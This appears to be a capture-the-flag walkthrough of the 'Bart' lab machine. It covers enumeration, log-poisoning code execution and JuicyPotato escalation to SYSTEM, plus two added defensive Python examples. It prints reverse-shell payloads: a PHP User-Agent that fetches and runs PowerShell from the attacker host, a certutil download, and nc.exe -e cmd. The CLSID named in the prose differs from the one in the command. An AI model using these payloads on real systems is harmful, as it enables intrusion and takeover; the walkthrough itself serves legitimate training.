# Bart

<figure><img src="/files/9esbFjSdMw89h8pegsNh" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the target machine for open ports quickly and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.81 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Mon Nov  7 11:36:41 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.81
Nmap scan report for 10.10.10.81
Host is up (0.060s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Mon Nov  7 11:37:08 2022 -- 1 IP address (1 host up) scanned in 26.68 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p80 10.10.10.81 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Mon Nov  7 11:38:02 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.81
Nmap scan report for 10.10.10.81
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  7 11:38:17 2022 -- 1 IP address (1 host up) scanned in 15.19 seconds
```

{% endcode %}

As we can see in the *nmap* report, the website on port *80* redirects to `forum.bart.htb`. Let's add that domain and `bart.htb` to the `/etc/hosts` file.

> nano /etc/hosts

```nginx
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.81     forum.bart.htb bart.htb
```

Let's take a look at the website.

<figure><img src="/files/rVcKfyKU7pcSWGrc6XUR" alt=""><figcaption></figcaption></figure>

At some point, we can see the team members.

<figure><img src="/files/X2wndA65NYToGdieMh5L" alt=""><figcaption></figcaption></figure>

In the page source, there is one more member who is commented out. Let's extract all the member names.

> curl -s http://forum.bart.htb/ | grep 'name"' | grep -oP ">.*?<" | tr -d "><"

```
Samantha Brown
Daniel Simmons
Robert Hilton
Harvey Potter
```

Now we have a potential list of users. Note that the website is on `forum.bart.htb`, but there may be other subdomains available.

> gobuster dns -d bart.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 200

* `dns` uses **DNS subdomain** enumeration mode.
* `-d` target **domain**.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     bart.htb
[+] Threads:    200
[+] Timeout:    1s
[+] Wordlist:   /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2022/11/07 16:09:50 Starting gobuster in DNS enumeration mode
===============================================================
Found: forum.bart.htb

Found: monitor.bart.htb

===============================================================
2022/11/07 16:10:16 Finished
===============================================================
```

Let's add the `monitor.bart.htb` subdomain name to the `/etc/hosts` file.

> nano /etc/hosts

```nginx
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.81     forum.bart.htb bart.htb monitor.bart.htb
```

The site shows a login page.

<figure><img src="/files/zjKVjHzgAslI4zA9cwR1" alt=""><figcaption></figcaption></figure>

If we try random credentials, we won't be able to log in.

<figure><img src="/files/ByfIyjdoUgjq9YNoqSD6" alt=""><figcaption></figcaption></figure>

But the `Forgot password?` button seems to indicate if the user is valid.

<figure><img src="/files/RB7AB40icYKj9HdEyWt6" alt=""><figcaption></figcaption></figure>

## Exploitation

At this point, I tried to check if any of the found users were valid, and the `harvey` user seems to be valid.

<figure><img src="/files/ss6q4c2EaZmvmoXSvjuj" alt=""><figcaption></figcaption></figure>

If we try the user `harvey`, and his surname `potter` as the password, we'll be able to log in.

<figure><img src="/files/IPTMfDXmmeODGqzPkFjZ" alt=""><figcaption></figcaption></figure>

Inside the `Server Monitor` application, we can see a server called `Internal Chat`.

<figure><img src="/files/tCPUwnkCnln0T9MsaJWu" alt=""><figcaption></figcaption></figure>

The server runs on the `internal-01.bart.htb` subdomain.

<figure><img src="/files/8cJ57QlhahXl1NoqcyNk" alt=""><figcaption></figcaption></figure>

Let's add the new subdomain to the `/etc/hosts` file.

> nano /etc/hosts

```nginx
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.81     forum.bart.htb bart.htb monitor.bart.htb internal-01.bart.htb
```

Then, we'll see that the new website contains another login form.

<figure><img src="/files/GtVhRvDz5FTzLT9JsHNe" alt=""><figcaption></figcaption></figure>

But the previous credentials are not valid in this case.

<figure><img src="/files/mst967Pi8ZghGDLNF4ny" alt=""><figcaption></figcaption></figure>

As the *Simple Chat* application is open source, we can inspect its source code in the *GitHub* [repository](https://github.com/magkopian/php-ajax-simple-chat). In the source code, we can see that there is a file called [register.php](https://github.com/magkopian/php-ajax-simple-chat/blob/master/simple_chat/register.php), but we are not able to access it directly.

> curl http://internal-01.bart.htb/simple_chat/register.php -L

* `-L` follow **redirects**.

```
The page cannot be displayed because an internal server error has occurred.
```

However, we can try to create a new user by sending a *POST* request to `register.php` with the `uname` and `passwd` parameters.

> curl http://internal-01.bart.htb/simple_chat/register.php -X POST -d "uname=alfa8sa&passwd=alfa8sa123"

Now, we could log in as the new user we just created.

<figure><img src="/files/gNNGjt2qDH1mNhH3kwlV" alt=""><figcaption></figcaption></figure>

We will see a chat, where `bobby` is saying not to place development code there.

<figure><img src="/files/HcZ01O381jN52aje7Cky" alt=""><figcaption></figcaption></figure>

So, if we take a look at the source code, we'll see some *JavaScript* code which sends a *GET* request to some interesting *URL*.

```html
<script>
    function saveChat() {
        // create a serialized object and send to log_chat.php. Once the XHR request is done, alert "Done"
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function() {
            if (xhr.readyState == XMLHttpRequest.DONE) {
                alert(xhr.responseText);
            }
        }
        xhr.open('GET', 'http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey', true);
        xhr.send(null);
        alert("Done");
    }
</script>
```

If we send a *GET* request to that URL, we'll get a `1` as a response.

> curl "http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey"

```
1
```

Note the `filename` parameter is set to `log.txt`. If we try to read the file, we'll see log entries indicating the user and the *User-Agent*.

> curl "http://internal-01.bart.htb/log/log.txt"

```
[2018-02-21 22:35:17] - harvey - Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
[2022-11-07 18:45:31] - harvey - curl/7.85.0
[2022-11-07 18:45:34] - harvey - curl/7.85.0
```

We could try to change the `filename` parameter to a file that doesn't exist and has the `.php` extension, so that the log entry itself becomes *PHP* code and we can eventually run commands on the system. In this case, I will create the `pwn.php` file and set the *User-Agent* to a command that downloads a file called `rv.ps1` from my machine, which will send us a reverse shell.

> curl "http://internal-01.bart.htb/log/log.php?filename=pwn.php&username=harvey" -H "User-Agent: <?php system('powershell IEX(New-Object Net.WebClient).downloadString(\"http://10.10.14.8/rv.ps1\")');?>"

First, download the [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) script from *Nishang* and add the following call at the end of it, so that the function runs as soon as the script is loaded. I will rename the file to `rv.ps1`.

> mv Invoke-PowerShellTcp.ps1 rv.ps1
>
> nano rv.ps1

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444
```

Now, set a *netcat* listener on port *4444* with *rlwrap*.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

And start a simple HTTP server with python in the current directory.

> python -m http.server 80

If we now send a *GET* request to the `pwn.php` file, the payload will be executed and we should catch a reverse shell on our netcat listener.

> curl "http://internal-01.bart.htb/log/pwn.php"

```
Listening on 0.0.0.0 4444
Connection received on 10.10.10.81 49673
Windows PowerShell running as user BART$ on BART
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot\internal-01\log>whoami
nt authority\iusr
```
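The defect that makes this work is that `log.php` lets the client pick the output file name (including its extension and its location under the web root) and writes the raw *User-Agent* into it. The following Python is an added example, not code from the page or from the Simple Chat project: a log writer that maps the client-supplied name onto a fixed allowlist in a directory outside the web root (the `/var/app-logs` path and the allowlist are assumptions for the example) and neutralises script-tag characters, plus a detector that flags existing entries whose *User-Agent* field carries PHP tags, run over a constructed sample log in the same format as `log.txt` above.

```python
import re
from datetime import datetime
from pathlib import Path
from typing import Iterable, List, Optional, Tuple

# Assumed for this example: logs live outside the web root, so nothing written
# here can be requested (let alone executed) through the web server.
LOG_DIR = Path("/var/app-logs")           # hypothetical path, not from the page
ALLOWED_LOGS = {"log.txt", "chat.txt"}    # fixed names instead of a client-chosen one

# Control characters and angle brackets are replaced before any user-controlled
# value (here the User-Agent header) becomes part of a log line.
_UNSAFE = re.compile(r"[\x00-\x1f\x7f<>]")

# Patterns that mean a User-Agent field was used to plant code in the log.
_INJECT = re.compile(r"<\?(php|=)|<script\b|\?>", re.IGNORECASE)


def safe_log_path(filename: str) -> Path:
    """Map a client-supplied log name onto the allowlist; refuse anything else.

    The page's log.php accepted any name, which is how pwn.php ended up under
    the web root. Here neither the extension nor the directory can be chosen
    by the client: only an exact allowlisted name is accepted.
    """
    if filename not in ALLOWED_LOGS:
        raise ValueError(f"log name not allowed: {filename!r}")
    return LOG_DIR / filename


def format_entry(username: str, user_agent: str, when: Optional[datetime] = None) -> str:
    """Build a line in the page's log format with dangerous characters neutralised."""
    when = when or datetime.now()
    clean_user = re.sub(r"[^A-Za-z0-9_.-]", "?", username)[:64]
    clean_ua = _UNSAFE.sub("?", user_agent)[:256]
    return f"[{when:%Y-%m-%d %H:%M:%S}] - {clean_user} - {clean_ua}"


def suspicious_entries(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (line_number, line) for entries whose User-Agent field looks like injected code."""
    hits = []
    for number, line in enumerate(lines, 1):
        parts = line.split(" - ", 2)          # timestamp, user, user-agent
        if len(parts) == 3 and _INJECT.search(parts[2]):
            hits.append((number, line))
    return hits


# Constructed sample log in the format shown in log.txt above; the third line is
# a made-up poisoned entry (a harmless echo, not a shell).
SAMPLE_LOG = [
    "[2018-02-21 22:35:17] - harvey - Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
    "[2022-11-07 18:45:31] - harvey - curl/7.85.0",
    "[2022-11-07 18:46:02] - harvey - <?php echo 'poisoned'; ?>",
]

if __name__ == "__main__":
    for number, line in suspicious_entries(SAMPLE_LOG):
        print(f"line {number}: {line}")
    print(format_entry("harvey", "<?php echo 'poisoned'; ?>"))
    try:
        safe_log_path("pwn.php")
    except ValueError as err:
        print(err)
```

The two halves cover the two places a defender can act: the writer makes the poisoning impossible in the first place (no client-chosen path, no executable characters, no file under the web root), and the detector is what you would run over an existing `log.txt` to find out whether this has already happened. Note that `format_entry` output never trips `suspicious_entries`, so the detector can also be used as a regression check on the writer.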

## Privilege Escalation

Let's see what privileges the user `nt authority\iusr` has.

> whoami /priv

```
PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
```

If a user has the *SeImpersonatePrivilege*, the first thing that comes to mind is *JuicyPotato*.

{% hint style="info" %}
**JuicyPotato** is a local privilege escalation tool for Windows that abuses COM objects. It requires that *SeImpersonate* or *SeAssignPrimaryToken* be enabled.

<https://github.com/ohpe/juicy-potato>
{% endhint %}
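Added example, not from the page: a small Python parser for `whoami /priv` output and a check that flags the token privileges that make impersonation-based escalation possible, run over the output shown above (embedded as a constructed string). From a hardening point of view, IIS application pool identities and many service accounts hold *SeImpersonatePrivilege* by default, so the finding is less "remove the privilege" than "any code execution as this account is one step from SYSTEM"; a check like this is useful when triaging which service accounts are exposed.

```python
from typing import Dict, List

# Privileges that let a process that already runs code turn its token into a
# more privileged one through impersonation (the SeImpersonatePrivilege case
# the page is about, and its SeAssignPrimaryToken sibling).
HIGH_RISK_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample: the whoami /priv output shown above for nt authority\iusr.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Parse `whoami /priv` output into {privilege name: state}.

    Data rows follow the '====' ruler; the description column contains spaces,
    so the privilege is the first whitespace-separated token and the state is
    the last, and everything in between is ignored.
    """
    privileges: Dict[str, str] = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("===="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        if len(parts) >= 3:
            privileges[parts[0]] = parts[-1]
    return privileges


def risky_enabled(privileges: Dict[str, str]) -> List[str]:
    """Names of high-risk privileges that are present and enabled."""
    return sorted(
        name for name, state in privileges.items()
        if name in HIGH_RISK_PRIVILEGES and state == "Enabled"
    )


if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name in risky_enabled(privs):
        print(f"{name} is enabled: token impersonation attacks apply")
```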

To escalate privileges, we'll have to transfer `JuicyPotato.exe` to the victim machine. Let's set a python *HTTP* server on the directory where we have the *JuicyPotato* binary.

> python -m SimpleHTTPServer

And download the binary on the victim machine, in this case from the desktop folder of the `nt authority\iusr` user.

> certutil.exe -f -urlcache -split http://10.10.14.8:8000/JuicyPotato.exe JuicyPotato.exe

Before executing the `JuicyPotato.exe` binary, let's set another netcat listener on port *5555* to catch a reverse shell as the `NT AUTHORITY\SYSTEM` user.

> nc -lvnp 5555

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

And let's set up an SMB server in the directory where the `nc.exe` binary is located.

> impacket-smbserver smbFolder $(pwd) -smb2support

Finally, let's run the *JuicyPotato* binary to get a shell as the `NT AUTHORITY\SYSTEM` user.

> .\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.8 5555"

* `-t` **createprocess** call.
* `-l` COM server listen **port**.
* `-p` **program** to launch.
* `-a` specify command **arguments**.

```
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: 10038
```

But we get an error. This happens because *JuicyPotato* is using its default *CLSID*, which does not match this system. If we check the system information, we'll see the machine is running `Microsoft Windows 10 Pro`.

> systeminfo

```
Host Name:                 BART
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.15063 N/A Build 15063
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00330-80110-20834-AA869
Original Install Date:     24/09/2017, 19:35:51
System Boot Time:          07/11/2022, 16:02:27
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,003 MB
Virtual Memory: Max Size:  5,567 MB
Virtual Memory: Available: 4,451 MB
Virtual Memory: In Use:    1,116 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.81
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```

So we have to change the *CLSID* to a valid one. You can check a Windows 10 Pro *CLSID* list [here](https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Pro).

{% hint style="info" %}
The Class ID, or **CLSID**, is a globally unique identifier (GUID) for an application component (a COM class) in Windows. In practice, this means all registry entries for an application component can usually be found under the registry key `HKEY_CLASSES_ROOT\CLSID\{CLSID value}`.
{% endhint %}

If we change it for `{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}`, we should get the reverse shell. Then all we have to do is reap the harvest and take both the user flag and the root flag.

> .\JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.14.8\smbFolder\nc.exe -e cmd 10.10.14.8 5555" -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"

* `-t` **createprocess** call.
* `-l` COM server listen **port**.
* `-p` **program** to launch.
* `-a` specify command **arguments**.
* `-c` use **CLSID**.

```
Listening on 0.0.0.0 5555
Connection received on 10.10.10.81 49782
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type \users\h.potter\desktop\user.txt
80f0378a52202e4dd1124561c95b64cb

C:\Windows\system32>type \users\administrator\desktop\root.txt
de8a53b5078c8b37fc29c1309d256a37
```

